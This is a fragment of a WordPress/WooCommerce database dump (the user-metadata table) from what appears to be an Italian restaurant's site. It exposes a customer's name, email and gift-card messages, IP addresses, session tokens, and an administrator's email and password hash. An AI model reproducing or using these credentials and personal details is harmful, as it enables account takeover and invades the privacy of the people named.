),(1946,67,'session_tokens','a:1:{s:64:\"ac7309bc4e792590d52d744a782e5cb53c737e9bd70bbdd2ab44a4a70a9bbe06\";a:4:{s:10:\"expiration\";i:1611228430;s:2:\"ip\";s:13:\"49.236.208.31\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:5:\"login\";i:1610018830;}}'),(1947,67,'wc_last_active','1609977600'),(1948,67,'facebook',''),(1949,67,'instagram',''),(1950,67,'linkedin',''),(1951,67,'myspace',''),(1952,67,'pinterest',''),(1953,67,'soundcloud',''),(1954,67,'tumblr',''),(1955,67,'twitter',''),(1956,67,'youtube',''),(1957,67,'wikipedia',''),(1958,67,'last_update','1610018844'),(1959,1,'_last_order','1124'),(1964,68,'nickname','franzoni.elena'),(1970,68,'comment_shortcuts','false'),(1971,68,'admin_color','fresh'),(1972,68,'use_ssl','0'),(1973,68,'show_admin_bar_front','true'),(1974,68,'locale',''),(1975,68,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1976,68,'wp_user_level','0'),(1977,68,'_yoast_wpseo_profile_updated','1611163650'),(1978,68,'session_tokens','a:3:{s:64:\"6d0bac696e7a2a4bb14f05e497f4867c3f2962a55488f33250abb5136b318e53\";a:4:{s:10:\"expiration\";i:1612373254;s:2:\"ip\";s:13:\"158.148.91.19\";s:2:\"ua\";s:142:\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/131.0.339159990 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1611163654;}s:64:\"1be6ddde2fbb4bf2640b9e8ea557a9c57ae13f1ad3b094c0ab10c0190eaee9df\";a:4:{s:10:\"expiration\";i:1611340714;s:2:\"ip\";s:13:\"158.148.91.19\";s:2:\"ua\";s:137:\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1611167914;}s:64:\"31c295b1014f5ef04e8073759cb359a7a9069f38da8f2248eaa21d6638eb1ff8\";a:4:{s:10:\"expiration\";i:1611343108;s:2:\"ip\";s:13:\"158.148.91.19\";s:2:\"ua\";s:137:\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1\";s:5:\"login\";i:1611170308;}}'),(1979,68,'wc_last_active','1611100800'),(1981,68,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:5:{s:32:\"b396f50aa95491ea9055b118689282fd\";a:12:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:6:{s:24:\"mwb_wgm_to_name_optional\";s:15:\"Elena Franzoni \";s:16:\"mwb_wgm_to_email\";s:24:\"franzoni.elena@gmail.com\";s:17:\"mwb_wgm_from_name\";s:14:\"Elena Franzoni\";s:15:\"mwb_wgm_message\";s:37:\"Per Alesssandra Salsi e Ivano Filippi\";s:15:\"delivery_method\";s:17:\"Mail to recipient\";s:13:\"mwb_wgm_price\";s:3:\"125\";}}s:3:\"key\";s:32:\"b396f50aa95491ea9055b118689282fd\";s:10:\"product_id\";i:472;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:125;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:125;s:8:\"line_tax\";i:0;}s:32:\"a1ba310a612015a78a94d695c26e3a40\";a:12:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:5:{s:16:\"mwb_wgm_to_email\";s:32:\"Salsi Alessandra e Filippi Ivano\";s:17:\"mwb_wgm_from_name\";s:14:\"Elena Franzoni\";s:15:\"mwb_wgm_message\";s:6:\"Grazie\";s:15:\"delivery_method\";s:12:\"Downloadable\";s:13:\"mwb_wgm_price\";s:3:\"125\";}}s:3:\"key\";s:32:\"a1ba310a612015a78a94d695c26e3a40\";s:10:\"product_id\";i:472;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:125;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:125;s:8:\"line_tax\";i:0;}s:32:\"5733464faa0a09ae15a808c71544f379\";a:12:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:6:{s:16:\"mwb_wgm_to_email\";s:32:\"Alessandra Salsi e Ivano Filippi\";s:17:\"mwb_wgm_from_name\";s:14:\"Elena Franzoni\";s:15:\"mwb_wgm_message\";s:29:\"Buon pranzo/cena romantica...\";s:15:\"delivery_method\";s:12:\"Downloadable\";s:13:\"mwb_wgm_price\";s:3:\"125\";s:18:\"mwb_wgm_browse_img\";s:41:\"3B48B87B-D3BE-4061-BE06-8D57569FC7A1.jpeg\";}}s:3:\"key\";s:32:\"5733464faa0a09ae15a808c71544f379\";s:10:\"product_id\";i:472;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:125;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:125;s:8:\"line_tax\";i:0;}s:32:\"4376c5d113437fe51d24d1553a4e6368\";a:12:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:6:{s:16:\"mwb_wgm_to_email\";s:32:\"Salsi Alessandra e Filippi Ivano\";s:17:\"mwb_wgm_from_name\";s:14:\"Elena Franzoni\";s:15:\"mwb_wgm_message\";s:32:\"Buon pranzo/cenetta romantica...\";s:15:\"delivery_method\";s:12:\"Downloadable\";s:13:\"mwb_wgm_price\";s:3:\"125\";s:18:\"mwb_wgm_browse_img\";s:41:\"9F48AA29-7569-4DDC-A3AC-1FBDC4CA13EE.jpeg\";}}s:3:\"key\";s:32:\"4376c5d113437fe51d24d1553a4e6368\";s:10:\"product_id\";i:472;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:125;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:125;s:8:\"line_tax\";i:0;}s:32:\"c7ea499c153e170f81aa61735db2175e\";a:7:{s:12:\"product_meta\";a:1:{s:9:\"meta_data\";a:5:{s:16:\"mwb_wgm_to_email\";s:32:\"Salsi Alessandra e Filippi Ivano\";s:17:\"mwb_wgm_from_name\";s:14:\"Elena Franzoni\";s:15:\"mwb_wgm_message\";s:29:\"Buon pranzo/cenetta romantica\";s:15:\"delivery_method\";s:12:\"Downloadable\";s:13:\"mwb_wgm_price\";s:3:\"125\";}}s:3:\"key\";s:32:\"c7ea499c153e170f81aa61735db2175e\";s:10:\"product_id\";i:472;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b79ba8791f445b078b67e850e44d8677\";}}}'),(1984,69,'nickname','yxyzxxfsdvx'),(1985,69,'first_name',''),(1986,69,'last_name',''),(1987,69,'description',''),(1988,69,'rich_editing','true'),(1989,69,'syntax_highlighting','true'),(1990,69,'comment_shortcuts','false'),(1991,69,'admin_color','fresh'),(1992,69,'use_ssl','0'),(1993,69,'show_admin_bar_front','false'),(1994,69,'locale',''),(1995,69,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(1996,69,'wp_user_level','0'),(1997,69,'_yoast_wpseo_profile_updated','1611261469'),(1998,69,'session_tokens','a:1:{s:64:\"fbeeb55011907ed3b1346f225377570adb2c7d1c4ea74b136268149ca2a86188\";a:4:{s:10:\"expiration\";i:1612471072;s:2:\"ip\";s:12:\"54.39.49.215\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:5:\"login\";i:1611261472;}}'),(1999,69,'wc_last_active','1611187200'),(2000,69,'facebook',''),(2001,69,'twitter',''),(2002,69,'linkedin',''),(2003,69,'instagram',''),(2004,69,'pinterest',''),(2005,69,'tumblr',''),(2006,69,'googleplus',''),(2007,69,'myspace',''),(2008,69,'soundcloud',''),(2009,69,'youtube',''),(2010,69,'wikipedia',''),(2011,69,'last_update','1611261490'),(2013,70,'nickname','tjxkptpcknz'),(2014,70,'first_name',''),(2015,70,'last_name',''),(2016,70,'description',''),(2017,70,'rich_editing','true'),(2018,70,'syntax_highlighting','true'),(2019,70,'comment_shortcuts','false'),(2020,70,'admin_color','fresh'),(2021,70,'use_ssl','0'),(2022,70,'show_admin_bar_front','false'),(2023,70,'locale',''),(2024,70,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(2025,70,'wp_user_level','0'),(2026,70,'_yoast_wpseo_profile_updated','1611309636'),(2027,70,'session_tokens','a:1:{s:64:\"47313dbf5a71b103279f00a4f268e09d2c6718a5c8c7c37db02128989f2cde10\";a:4:{s:10:\"expiration\";i:1612519239;s:2:\"ip\";s:11:\"68.183.8.48\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:5:\"login\";i:1611309639;}}'),(2028,70,'wc_last_active','1611273600'),(2029,70,'facebook',''),(2030,70,'twitter',''),(2031,70,'linkedin',''),(2032,70,'instagram',''),(2033,70,'pinterest',''),(2034,70,'tumblr',''),(2035,70,'googleplus',''),(2036,70,'myspace',''),(2037,70,'soundcloud',''),(2038,70,'youtube',''),(2039,70,'wikipedia',''),(2040,70,'last_update','1611309692'),(2042,1,'wp_media_library_mode','list'),(2043,1,'upload_per_page','50'),(2045,71,'nickname','attika'),(2046,71,'first_name',''),(2047,71,'last_name',''),(2048,71,'description',''),(2049,71,'rich_editing','true'),(2050,71,'syntax_highlighting','true'),(2051,71,'comment_shortcuts','false'),(2052,71,'admin_color','fresh'),(2053,71,'use_ssl','0'),(2054,71,'show_admin_bar_front','true'),(2055,71,'locale',''),(2056,71,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(2057,71,'wp_user_level','10'),(2058,71,'_yoast_wpseo_profile_updated','1611432051'),(2059,71,'dismissed_wp_pointers','vc_pointers_backend_editor'),(2060,71,'session_tokens','a:1:{s:64:\"72540529abb8887af58f8e1a47fe529937a38026686187afb534b04daa4c6f48\";a:4:{s:10:\"expiration\";i:1611821751;s:2:\"ip\";s:14:\"24.135.208.135\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\";s:5:\"login\";i:1611648951;}}'),(2061,71,'wc_last_active','1611619200'),(2063,71,'_woocommerce_tracks_anon_id','woo:gj2K4zWdBXYXZEZfIFbnKQBc'),(2064,71,'wp_dashboard_quick_press_last_post_id','4597'),(2065,71,'wp_yoast_notifications','a:3:{i:0;a:2:{s:7:\"message\";O:61:\"Yoast\\WP\\SEO\\Presenters\\Admin\\Indexing_Notification_Presenter\":3:{s:18:\"\0*\0total_unindexed\";i:75;s:9:\"\0*\0reason\";s:26:\"permalink_settings_changed\";s:20:\"\0*\0short_link_helper\";O:38:\"Yoast\\WP\\SEO\\Helpers\\Short_Link_Helper\":2:{s:17:\"\0*\0options_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Options_Helper\":0:{}s:17:\"\0*\0product_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Product_Helper\":0:{}}}s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:2:\"71\";s:10:\"user_login\";s:6:\"attika\";s:9:\"user_pass\";s:34:\"$P$BP9bBLRh6IZ.Jwq1Kg8d0WseozEWUD/\";s:13:\"user_nicename\";s:6:\"attika\";s:10:\"user_email\";s:27:\"attika@ristorantesolymar.it\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2021-01-23 20:00:51\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:6:\"attika\";}s:2:\"ID\";i:71;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";s:592:\"<strong>New in Yoast SEO 15.6: </strong>In the latest version of Yoast SEO, you’ll find a number of bug fixes and performance enhancements. And install the free Yoast Duplicate Post plugin to unlock the Rewrite & Republish feature, offering you the possibility to update a post/page without taking it offline or having to take extra steps! <a href=\"https://yoa.st/yoast15-6?php_version=7.3&#038;platform=wordpress&#038;platform_version=5.6&#038;software=free&#038;software_version=15.6.2&#038;days_active=30plus&#038;user_language=en_US\" target=\"_blank\">Read all about version 15.6 here</a>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"updated\";s:2:\"id\";s:20:\"wpseo-plugin-updated\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:2:\"71\";s:10:\"user_login\";s:6:\"attika\";s:9:\"user_pass\";s:34:\"$P$BP9bBLRh6IZ.Jwq1Kg8d0WseozEWUD/\";s:13:\"user_nicename\";s:6:\"attika\";s:10:\"user_email\";s:27:\"attika@ristorantesolymar.it\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2021-01-23 20:00:51\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:6:\"attika\";}s:2:\"ID\";i:71;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:164:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"wpcf_custom_post_type_view\";b:1;s:26:\"wpcf_custom_post_type_edit\";b:1;s:33:\"wpcf_custom_post_type_edit_others\";b:1;s:25:\"wpcf_custom_taxonomy_view\";b:1;s:25:\"wpcf_custom_taxonomy_edit\";b:1;s:32:\"wpcf_custom_taxonomy_edit_others\";b:1;s:22:\"wpcf_custom_field_view\";b:1;s:22:\"wpcf_custom_field_edit\";b:1;s:29:\"wpcf_custom_field_edit_others\";b:1;s:25:\"wpcf_user_meta_field_view\";b:1;s:25:\"wpcf_user_meta_field_edit\";b:1;s:32:\"wpcf_user_meta_field_edit_others\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:20:\"wpseo_manage_options\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:9:\"read_post\";b:1;s:24:\"read_private_sgpb_popups\";b:1;s:15:\"edit_sgpb_popup\";b:1;s:16:\"edit_sgpb_popups\";b:1;s:23:\"edit_others_sgpb_popups\";b:1;s:26:\"edit_published_sgpb_popups\";b:1;s:19:\"publish_sgpb_popups\";b:1;s:18:\"delete_sgpb_popups\";b:1;s:25:\"delete_others_sgpb_popups\";b:1;s:26:\"delete_private_sgpb_popups\";b:1;s:25:\"delete_private_sgpb_popup\";b:1;s:28:\"delete_published_sgpb_popups\";b:1;s:19:\"sgpb_manage_options\";b:1;s:18:\"manage_popup_terms\";b:1;s:29:\"manage_popup_categories_terms\";b:1;s:21:\"mailjet_plugin_access\";b:1;s:19:\"manage_postman_smtp\";b:1;s:19:\"manage_postman_logs\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:1:{s:13:\"dismiss_value\";s:6:\"15.6.2\";}s:13:\"dismissal_key\";s:20:\"wpseo-plugin-updated\";s:12:\"capabilities\";a:1:{i:0;s:20:\"wpseo_manage_options\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:2;a:2:{s:7:\"message\";s:430:\"Yoast SEO and WooCommerce can work together a lot better by adding a helper plugin. Please install Yoast WooCommerce SEO to make your life better. <a href=\"https://yoa.st/1o0?php_version=7.3&platform=wordpress&platform_version=5.6&software=free&software_version=15.6.2&days_active=30plus&user_language=en_US\" aria-label=\"More information about Yoast WooCommerce SEO\" target=\"_blank\" rel=\"noopener noreferrer\">More information</a>.\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:44:\"wpseo-suggested-plugin-yoast-woocommerce-seo\";s:4:\"user\";r:209;s:5:\"nonce\";N;s:8:\"priority\";d:0.5;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";a:1:{i:0;s:15:\"install_plugins\";}s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(2066,71,'community-events-location','a:1:{s:2:\"ip\";s:12:\"24.135.208.0\";}'),(2067,71,'wp_user-settings','editor=html'),(2068,71,'wp_user-settings-time','1611649063');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
